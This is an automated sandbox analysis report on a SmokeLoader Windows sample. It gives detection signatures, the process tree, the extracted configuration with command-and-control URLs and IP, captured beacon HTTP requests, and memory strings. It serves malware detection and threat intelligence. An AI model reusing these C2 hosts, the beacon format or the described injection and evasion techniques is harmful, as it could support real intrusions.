Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
e6reA52T4I.exe

Overview

General Information

Sample name:e6reA52T4I.exe
renamed because original name is a hash value
Original sample name:b05425661616539e0e68493474745880f03300d9b5cca894af732da010869778.exe
Analysis ID:1571560
MD5:855e7cd7024d340b83123c75d9d4fb1c
SHA1:3323fdcd6ce66e3c1b971b098f26a562892b8c30
SHA256:b05425661616539e0e68493474745880f03300d9b5cca894af732da010869778
Tags:213-21-220-222exeuser-JAMESWT_MHT
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • e6reA52T4I.exe (PID: 2304 cmdline: "C:\Users\user\Desktop\e6reA52T4I.exe" MD5: 855E7CD7024D340B83123C75D9D4FB1C)
    • e6reA52T4I.exe (PID: 4036 cmdline: "C:\Users\user\Desktop\e6reA52T4I.exe" MD5: 855E7CD7024D340B83123C75D9D4FB1C)
      • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • hdeufvw (PID: 6468 cmdline: C:\Users\user\AppData\Roaming\hdeufvw MD5: 855E7CD7024D340B83123C75D9D4FB1C)
    • hdeufvw (PID: 1384 cmdline: C:\Users\user\AppData\Roaming\hdeufvw MD5: 855E7CD7024D340B83123C75D9D4FB1C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2020, "C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.1863904346.0000000001F61000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000006.00000002.1863904346.0000000001F61000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x2f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000002.00000002.1577083390.0000000002341000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000002.00000002.1577083390.0000000002341000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x2f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      00000006.00000002.1863662169.0000000000500000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        Click to see the 9 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.2.hdeufvw.8615a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          6.2.hdeufvw.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            2.2.e6reA52T4I.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              0.2.e6reA52T4I.exe.9315a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Execution of Suspicious File Type Extension
                Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\hdeufvw, CommandLine: C:\Users\user\AppData\Roaming\hdeufvw, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\hdeufvw, NewProcessName: C:\Users\user\AppData\Roaming\hdeufvw, OriginalFileName: C:\Users\user\AppData\Roaming\hdeufvw, ParentCommandLine: , ParentImage: , ParentProcessId: 1040, ProcessCommandLine: C:\Users\user\AppData\Roaming\hdeufvw, ProcessId: 6468, ProcessName: hdeufvw

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-09T14:53:55.228635+010020391031A Network Trojan was detected192.168.2.1049705188.40.141.21180TCP
                2024-12-09T14:53:56.103539+010020391031A Network Trojan was detected192.168.2.1049705188.40.141.21180TCP
                2024-12-09T14:54:21.048517+010020391031A Network Trojan was detected192.168.2.1049705188.40.141.21180TCP
                2024-12-09T14:54:21.650388+010020391031A Network Trojan was detected192.168.2.1049705188.40.141.21180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-09T14:53:55.228635+010028518151A Network Trojan was detected192.168.2.1049705188.40.141.21180TCP
                2024-12-09T14:53:56.103539+010028518151A Network Trojan was detected192.168.2.1049705188.40.141.21180TCP
                2024-12-09T14:54:21.048517+010028518151A Network Trojan was detected192.168.2.1049705188.40.141.21180TCP
                2024-12-09T14:54:21.650388+010028518151A Network Trojan was detected192.168.2.1049705188.40.141.21180TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: e6reA52T4I.exeAvira: detected
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Roaming\hdeufvwAvira: detection malicious, Label: HEUR/AGEN.1312455
                Found malware configuration
                Source: 00000006.00000002.1863662169.0000000000500000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2020, "C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\hdeufvwReversingLabs: Detection: 81%
                Multi AV Scanner detection for submitted file
                Source: e6reA52T4I.exeReversingLabs: Detection: 87%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\hdeufvwJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: e6reA52T4I.exeJoe Sandbox ML: detected
                Source: e6reA52T4I.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_004257E0 GetConsoleProcessList,CharUpperA,CharToOemBuffA,CharToOemBuffA,GetConsoleProcessList,WriteProfileStringW,RegisterClassA,SetThreadContext,GetFileAttributesExA,_fputc,GetConsoleAliasW,WriteConsoleOutputCharacterA,GetFileType,GetConsoleAliasW,WriteConsoleOutputCharacterA,GetFileType,GlobalAlloc,GetWindowsDirectoryW,SetThreadAffinityMask,SetProcessShutdownParameters,GetWindowsDirectoryW,SetThreadAffinityMask,ReadConsoleOutputCharacterA,SetProcessShutdownParameters,BuildCommDCBAndTimeoutsW,GetVolumeInformationW,GetConsoleAliasA,SetProcessShutdownParameters,GetPrivateProfileStringW,GetPrivateProfileStringW,AddAtomA,GetSystemWindowsDirectoryW,DisconnectNamedPipe,AddAtomA,GetSystemWindowsDirectoryW,DisconnectNamedPipe,GetConsoleCursorInfo,VirtualProtect,InterlockedDecrement,GetCharWidthFloatW,ClearEventLogA,InterlockedDecrement,GetCharWidthFloatW,ClearEventLogA,GlobalUnfix,OpenWaitableTimerW,GlobalFlags,LocalFlags,LoadLibraryW,GetConsoleCursorInfo,SetConsoleCP,TerminateProcess,FindFirstFileA,InterlockedIncrement,GetVolumeNameForVolumeMountPointA,GetModuleHandleW,CreateActCtxA,_lclose,ReadConsoleW,GetNamedPipeHandleStateW,GetModuleHandleA,CreateEventA,ExpandEnvironmentStringsW,SetProcessAffinityMask,SetTimeZoneInformation,ActivateActCtx,DeleteVolumeMountPointA,0_2_004257E0
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_0042545B WriteConsoleInputW,GlobalGetAtomNameA,GetCommandLineW,MoveFileWithProgressA,FindFirstFileW,0_2_0042545B
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_00425400 WriteConsoleInputW,GlobalGetAtomNameA,GetCommandLineW,MoveFileWithProgressA,FindFirstFileW,0_2_00425400
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_004255C0 DisconnectNamedPipe,AddAtomA,GetSystemWindowsDirectoryW,ReadConsoleInputA,WriteConsoleInputW,GlobalGetAtomNameA,GetCommandLineW,MoveFileWithProgressA,FindFirstFileW,0_2_004255C0
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_004255F6 ReadConsoleInputA,WriteConsoleInputW,GlobalGetAtomNameA,GetCommandLineW,MoveFileWithProgressA,FindFirstFileW,0_2_004255F6
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_004255F4 ReadConsoleInputA,WriteConsoleInputW,GlobalGetAtomNameA,GetCommandLineW,MoveFileWithProgressA,FindFirstFileW,0_2_004255F4
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_00425659 WriteConsoleInputW,GlobalGetAtomNameA,GetCommandLineW,MoveFileWithProgressA,FindFirstFileW,0_2_00425659

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.10:49705 -> 188.40.141.211:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.10:49705 -> 188.40.141.211:80
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeNetwork Connect: 188.40.141.211 80Jump to behavior
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://host-file-host6.com/
                Source: Malware configuration extractorURLs: http://host-host-file8.com/
                Source: Joe Sandbox ViewIP Address: 188.40.141.211 188.40.141.211
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://spylvifr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: host-file-host6.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ubpctscp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 144Host: host-file-host6.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lrvsgmets.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 147Host: host-file-host6.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iwtkhvgidl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 274Host: host-file-host6.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: host-file-host6.com
                Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://spylvifr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: host-file-host6.com
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 7Content-Type: application/octet-streamDate: Mon, 09 Dec 2024 13:53:54 GMTData Raw: 03 00 00 00 7b fa b1 Data Ascii: {
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 0Content-Type: application/octet-streamDate: Mon, 09 Dec 2024 13:53:55 GMT
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 7Content-Type: application/octet-streamDate: Mon, 09 Dec 2024 13:54:20 GMTData Raw: 03 00 00 00 7b fa b1 Data Ascii: {
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 0Content-Type: application/octet-streamDate: Mon, 09 Dec 2024 13:54:21 GMT
                Source: explorer.exe, 00000003.00000000.1567258720.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1567258720.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2728248249.000000000952D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2728248249.00000000094DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: explorer.exe, 00000003.00000000.1567258720.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1567258720.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2728248249.000000000952D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2728248249.00000000094DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: explorer.exe, 00000003.00000000.1567258720.0000000009519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1567258720.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1567258720.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2728248249.000000000952D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2728248249.0000000009519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2728248249.00000000094DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: explorer.exe, 00000003.00000002.2732849760.000000000DFA0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2159062286.000000000D54C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2733305074.0000000010400000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D47A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2159452142.000000000D47A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://host-file-host6.com/
                Source: explorer.exe, 00000003.00000003.2159062286.000000000D54C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D47A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://host-file-host6.com/tingsTU;
                Source: explorer.exe, 00000003.00000003.2160992593.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D47A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2159452142.000000000D47A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2731587157.000000000D47A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2160168941.000000000D046000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://iwtkhvgidl.com/
                Source: explorer.exe, 00000003.00000003.2160992593.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2160168941.000000000D046000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://iwtkhvgidl.com/application/x-www-form-urlencodedMozilla/5.0
                Source: explorer.exe, 00000003.00000003.2158520711.000000000D47A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2159452142.000000000D47A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://lrvsgmets.com/
                Source: explorer.exe, 00000003.00000003.2159062286.000000000D54C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D47A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://lrvsgmets.com/ings#U
                Source: explorer.exe, 00000003.00000000.1567258720.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1567258720.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2728248249.000000000952D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2728248249.00000000094DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: explorer.exe, 00000003.00000003.2160246624.000000000305D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2725144997.000000000305D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1560749669.000000000305D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                Source: explorer.exe, 00000003.00000002.2727383323.0000000007B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.2724814325.0000000002C00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.2727361366.0000000007AF0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                Source: explorer.exe, 00000003.00000003.2158520711.000000000D47A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ubpctscp.net/
                Source: explorer.exe, 00000003.00000000.1569386783.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D1D5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2731587157.000000000D1D8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppin
                Source: explorer.exe, 00000003.00000003.2159452142.000000000D1F9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1569386783.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D1D5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                Source: explorer.exe, 00000003.00000002.2728248249.00000000093B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1567258720.00000000093B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/$
                Source: explorer.exe, 00000003.00000002.2728248249.00000000093B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1567258720.00000000093B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/X
                Source: explorer.exe, 00000003.00000000.1560749669.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2723738796.0000000000889000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1559516725.0000000000889000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2160246624.0000000002FBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2725144997.0000000002FC0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: explorer.exe, 00000003.00000002.2728248249.00000000093B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1567258720.00000000093B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
                Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=C2BB6DDCE8D847D6B779FE8AEC27D161&timeOut=5000&oc
                Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1560749669.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2725120474.0000000002FAE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2160909018.0000000002FAD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                Source: explorer.exe, 00000003.00000002.2728248249.0000000009390000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1567258720.0000000009390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comWzE
                Source: explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                Source: explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
                Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
                Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
                Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
                Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
                Source: explorer.exe, 00000003.00000000.1569386783.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D1D5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2731587157.000000000D1D8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comE
                Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15G9PH.img
                Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hJkDs.img
                Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
                Source: explorer.exe, 00000003.00000000.1569386783.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D1D5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2731587157.000000000D1D8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.comNaP0B
                Source: explorer.exe, 00000003.00000000.1569386783.000000000CFF4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2731587157.000000000D073000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2159155796.000000000D0B8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcemberZ
                Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                Source: explorer.exe, 00000003.00000002.2729091529.0000000009730000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1567932050.0000000009730000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/bat
                Source: explorer.exe, 00000003.00000000.1569386783.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D1D5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2731587157.000000000D1D8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com576
                Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/health/wellness/7-secrets-to-a-happy-old-age-backed-by-science/ss-AA1hwpvW
                Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
                Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/companies/legacy-park-auction-canceled-liquidation-proposed-here-s-w
                Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
                Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/my-husband-and-i-paid-off-our-mortgage-more-than-15-years
                Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
